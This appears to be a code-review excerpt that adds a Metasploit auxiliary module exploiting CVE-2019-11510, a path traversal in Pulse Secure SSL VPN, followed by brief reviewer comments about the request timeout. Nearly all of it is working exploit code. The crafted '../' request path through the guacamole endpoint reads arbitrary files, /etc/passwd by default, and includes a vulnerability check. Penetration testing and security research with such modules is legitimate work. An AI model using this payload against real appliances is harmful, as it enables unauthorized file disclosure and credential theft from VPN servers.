modules/auxiliary/gather/pulse_secure_file_disclosure.rb

```diff
@@ -0,0 +1,112 @@
+##
+# This module requires Metasploit: https://Metasploit.com/download
+#
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Post::File
+
+
+  def initialize(info = {})
+    super(update_info(info,
+     'Name'           => 'Pulse Secure SSL VPN guacamole Path Traversal',
+     'Description'    => %q{
+        Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
+        This exploit reads the specified file, and displays it.
+        This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
+      },
+      'References'     =>
+          [
+              [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ],
+              [ 'CVE', '2019-11510'],
+          ],
+          'Author'         => [
+            'Alyssa Herrera', # Proof of Concept
+            'Justin Wagner',  # 0xDezzy - Metasploit
+            'Orange Tsai'     # Discovery
+          ],
+      'License'        => MSF_LICENSE,
+  ))
+
+      register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Use SSL', true]),
+        OptString.new('FILE', [ '/etc/passwd',  "Define the remote file to view, ex:/etc/passwd", '/etc/passwd']),
+      ])
+
+  end
+
+  def check
+    #Tests to see if it can get /etc/passwd. If it can, it's vulnerable
+    uri = '/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'
+
+    print_good("Checking target...")
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri' => uri
+      })
+
+    unless res && res.code ==200
+      return Exploit::CheckCode::Safe
+    end
+
+    Msf::Exploit::CheckCode::Vulnerable
+  end
+
+  def run
+
+    uri = '/dana-na/../dana/html5acc/guacamole/'
+    file = datastore['FILE']
+    payload = "../../../../../..#{file}?/dana/html5acc/guacamole/"
+
+    print_status("Starting Exploit...")
+
+    res = send_request_raw(
+      {
+        'method'  => 'GET',
+        'uri'     => uri + payload,
+      },1395)
```

Comment:
`1395` is an awfully long timeout ...

Reply:
I'm still trying to figure out how to chunk the download, but this file is fairly large.

Reply:
Oddly specific!